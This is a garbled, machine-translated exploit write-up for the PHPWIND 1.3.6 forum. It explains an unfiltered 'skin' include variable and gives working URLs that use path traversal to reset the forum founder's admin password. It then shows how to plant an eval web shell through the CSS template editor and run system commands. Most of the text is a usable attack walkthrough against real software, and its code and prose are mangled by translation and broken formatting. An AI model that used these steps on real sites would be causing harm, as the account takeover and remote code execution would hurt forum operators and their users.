PHPWIND1.3.6 Forum Vulnerability Analysis

PHPWIND is a popular PHP forum with beautiful interfaces and powerful functions. However, if you look at it carefully, you will find that it is very similar to DISCUZ in terms of interface functions and code style. I don't need to mention the specific reason. After all, DISCUZ is much earlier than it. However, it does not inherit the advantages of DISCUZ in terms of security. The DISCUZ Forum is very secure, and merchants also pay great attention to security issues. In domestic forums, no matter whether it is functional or secure, the first non-DISCUZ is the only one. Although PHPWIND has strict code and clear logic, PHPWIND still has some vulnerabilities and is quite serious.
One skin variable is not filtered and the administrator password is changed.
Let's analyze the vulnerabilities. The vulnerability code is as follows (header. php ):
! Function_exists ('readover') & exit ('forbidden ');
If (! $ Skin) $ skin = $ db_defaultstyle;
If (file_exists (R_P. "data/style/$ skin. php ")){
Include_once (R_P. "data/style/$ skin. php ");
} Else {
Include_once (R_P. "data/style/wind. php ");
}
$ Yeyeyestyle = 'no '? $ I _table = "bgcolor = $ tablecolor": $ I _table = 'class = I _table ';
If ($ groupid = 'guest '& $ db_regpopup = '1 '){
$ Head_pop = 'head _ pop ';
} Else {
$ Head_gotmsg = $ winddb ['newpm '] = 1? 'You have new message': 'short message ';
}
Require_once (PrintEot ('css '));

Require_once (PrintEot ('header '));
?>
Here, the $ skin variable is submitted. Before running it here, only one place has processed the $ skin variable:

$ _ COOKIE ['skinco'] & empty ($ skin) & $ skin =$ _ COOKIE ['skinco'];
Statement to determine whether the COOKIE contains skinco information. If so, obtain the value in the COOKIE, which is used to process the personal page style. However, if the COOKIE does not contain this value, the submitted skin variable will be passed to the vulnerability code. Someone asked, if the system shuts down register_globals, it doesn't matter.
If (! Ini_get ('register _ globals') |! Get_magic_quotes_gpc ()){
@ Extract ($ _ POST, EXTR_SKIP );
@ Extract ($ _ GET, EXTR_SKIP );
@ Extract ($ _ COOKIE, EXTR_SKIP );
@ Extract ($ _ FILES, EXTR_SKIP );
}
The system is released again in global. php. Therefore, no matter whether we use the GET or POST method, we can pass the constructed SKIN variable to the program. What is the purpose of transmitting data to the program? This is the focus!
Let's look at this Code:
If (file_exists (R_P. "data/style/$ skin. php ")){
Include_once (R_P. "data/style/$ skin. php ");
}...
It means if R_P. "data/style/$ skin. php ") the file is included when it exists, and I will not analyze several usage cases. I will give you the simplest and most harmful method to use.
We set the skin value ".. /.. /admin/manager ", it becomes R_P. "data/style /.. /.. /admin/manager. php ", obviously, this is a program for Forum Management users, which exists and can be executed. This program is specifically used to modify SQL _config.php, which contains important data, including the username and password of the Forum founder. You only need to construct the password and directly log on to the background for management. Before the change, we can check the username of the founder.
I will give you a method to view it. You can analyze it by yourself compared with the Forum program. I will not repeat it here.
Http: // localhost/phpwind/faq. php? Skin =.../../admin/manager & tplpath = admin

Figure 1

 

Screen. width-333) this. width = screen. width-333 "border = 0>

The above is on our machine, where the tplpath variable is very important and must be admin. It is a template path and will not be displayed if the parameter is incorrect.

After reading the user name, we can change its password.
Http: // localhost/phpwind/faq. php? Skin =.../admin/manager & username = admin & password = xiaohua & check_pwd = xiaohua & action = go
The meanings of the above parameters can be understood at a Glance. The username must be added with the username and password set by yourself. As to why the above method is used, it is actually very simple manager. we can submit all the variables required by php. The preceding variables are what they need, so we will submit these variables. Note that the preceding actions must have values. After the submission, the system does not display anything. It doesn't matter. We use the first method to find that the two passwords are different, proving that we have successfully changed the password. 2:

Screen. width-333) this. width = screen. width-333 "border = 0>

After the password is changed, we can log on to the Management page.
Http: // localhost/phpwind/admin. php

Screen. width-333) this. width = screen. width-333 "border = 0>

The second background uses the upload SHELL
I have changed the administrator password to control the Forum, but I don't think SHELL is always half done. To upload a SHELL, you must use the background functions. PHPWIND does not know whether to give the Administrator great permissions or think that no one has the ability to enter the background. The background right is really amazing. In fact, we don't rely on the above method. It's not difficult to get the administrator password through cross-site means. I don't know what the Forum writers think.
Well, I'll just pick a place with great dangers and analyze the style template settings.
Click the link on the left and/template/wind/css.htm will be displayed on the right.
The simplified function provided by the system is that you can edit the CSS file at will, customize the Forum interface, and include the css file when the Forum is running, although its extension is. htm, but it will still run like other PHP files. If we can write some PHP code like this css.htm file, it is equivalent to writing a SHELL, isn't it very easy. The length is limited. I will give you a method to use it. Replace the text in textarea on the right with the text below, and click Submit.
Eval ($ _ GET [myphpcode]);
?>
You 'd better construct it by yourself, of course, according to the above structure. However, I have done experiments on the above method, and the success rate is very high.
Save and use the following method.
Http: // localhost/phpwind/faq. php? Myphpcode = echo % 20 system (dir); exit;
4 after running

Screen. width-333) this. width = screen. width-333 "border = 0>

You can run other PHP statements, which are not described here.